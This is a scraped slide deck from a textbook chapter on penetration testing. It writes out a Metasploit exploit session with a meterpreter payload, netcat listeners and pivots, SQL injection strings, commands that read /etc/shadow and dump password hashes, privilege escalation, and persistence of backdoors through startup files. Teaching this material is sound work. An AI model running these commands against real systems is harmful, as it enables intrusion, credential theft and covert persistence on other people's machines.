Presentation is loading. Please wait.

Presentation is loading. Please wait.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Similar presentations


Presentation on theme: "Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1."— Presentation transcript:

1 Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1 Chapter 8: Penetration Testing

2 Key Forms of Penetration Attacks Buffer overflows Command injection SQL injection 10/12/2014 DRAFT2 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

3 Network Penetration and Metasploit (Console Session) # cd /pentest/exploits/framework3 #./msfconsole msf > search MS msf > use exploit/windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > info msf exploit(ms06_040_netapi) > show payloads msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms06_040_netapi) > show options msf exploit(ms06_040_netapi) > set RHOST msf exploit(ms06_040_netapi) > show targets msf exploit(ms06_040_netapi) >set TARGET 5 msf exploit(ms06_040_netapi) >show options msf exploit(ms06_040_netapi) > save msf exploit(ms06_040_netapi) > check msf exploit(ms06_040_netapi) > exploit msf exploit(ms06_040_netapi) > sessions –l msf exploit(ms06_040_netapi) > sessions –i 1 meterpreter> ? 10/12/2014 DRAFT3 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

4 Netcat, Pivoting, and Raw Shells Setting up and connecting a listener: –Target # nc –l –p 80 –Tester # nc Setting up a 3 machine pivot: –Target (.30)# nc –l –p 80 –RelaySetup# mknod FIFO p –Relay(.10)# nc –l –p 200 FIFO –Tester # nc – /12/2014 DRAFT4 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

5 Attacking Web/Internet Applications and Databases SQL injection attacks: –false') OR ('true' = 'true’: Grouping by parentheses –false' OR 'true' = 'true'; --: -- is an SQL comment, ends statement –' OR 'true' = 'true' -- –: 0 ; select * from Student where 0=0 ; -- – 0' UNION SELECT * FROM Student where 0=0 -- Paros Proxy is a Backtrack tool for man in the middle attacks 10/12/2014 DRAFT5 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

6 User Enumeration and Hash Grabbing Gather web addresses on Backtrack –# cd /pentest/enumeration/google/theHarvester –#./theHarvester.py –d cnn.com –b pgp Hash grabbing with meterpreter –meterpreter> use privs –meterpreter> hashdump Enumeration on Linux –# cut –d: –f1 /etc/passwd Hash grabbing from root on Linux # grep –v ':x:' /etc/shadow | grep –v ':!:' | cut –d: – f2 10/12/2014 DRAFT6 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

7 Password Cracking Password policies on Windows –Local Windows password policies: C:\> net accounts –Windows domain password policies: C:\> net accounts /domain John the Ripper supports password cracking –based on brute force, dictionary, fuzzing Rainbow table techniques are highly efficient algorithms for cracking complex passwords using tables with exhaustive password/hash lists Cain & Abel cracks passwords from all Windows formats, popular network devices, and databases using multiple techniques, such as brute force, dictionary, and rainbow tables 10/12/2014 DRAFT7 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

8 Privilege Escalation Privilege escalation means gaining administrative privileges, e.g. root Some metasploit exploits automatically escalate, e.g. –modules/exploit/unix/smtp/exim4_string_format, used with the shell_reverse_tcp payload Meterpreter can also escalate, for example: –meterpreter > use privs: Load the Privs module –meterpreter > getsystem –h: Help text –meterpreter > getsystem: Privilege escalation –meterpreter > hashdump: Grab password hashes 10/12/2014 DRAFT8 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

9 Final Malicious Attack Phases Forward and Reverse Backdoors –Easy to setup using netcat listeners Entrenchment –To survive reboot add backdoor to /etc/rc.local, /etc/rc.d/rc.local (both Linux) or the Startup Folder (Windows) Hidden Files – Easily accomplished on Windows (checkbox) or Linux (. or.. filename) Rootkits –Rootkits are an ultimate form of malicious entrenchment. 10/12/2014 DRAFT9 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

10 REVIEW CHAPTER SUMMARY Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions 10/12/2014 DRAFT10


Download ppt "Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1."

Similar presentations


Ads by Google